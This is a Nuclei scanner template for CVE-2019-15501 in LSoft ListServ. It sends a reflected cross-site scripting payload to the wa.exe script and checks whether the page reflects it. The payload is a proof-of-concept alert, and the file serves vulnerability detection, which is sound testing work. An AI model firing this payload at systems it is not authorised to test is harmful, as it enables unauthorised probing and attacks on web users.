nuclei-templates/cves/2019/CVE-2019-15501.yaml

33 lines
765 B
YAML
Raw Normal View History

2021-08-24 01:15:08 +00:00
id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
author: Borna Nematzadeh
severity: medium
2021-08-24 11:37:33 +00:00
reference: |
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
tags: cve,cve2019,xss
2021-08-24 01:15:08 +00:00
requests:
- method: GET
path:
2021-08-24 11:37:33 +00:00
- '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-24 01:15:08 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-24 11:37:33 +00:00
- '</script><script>alert(document.domain)</script>'
2021-08-24 01:15:08 +00:00
part: body
- type: word
part: header
2021-08-24 11:37:33 +00:00
words:
- text/html
- type: status
status:
- 200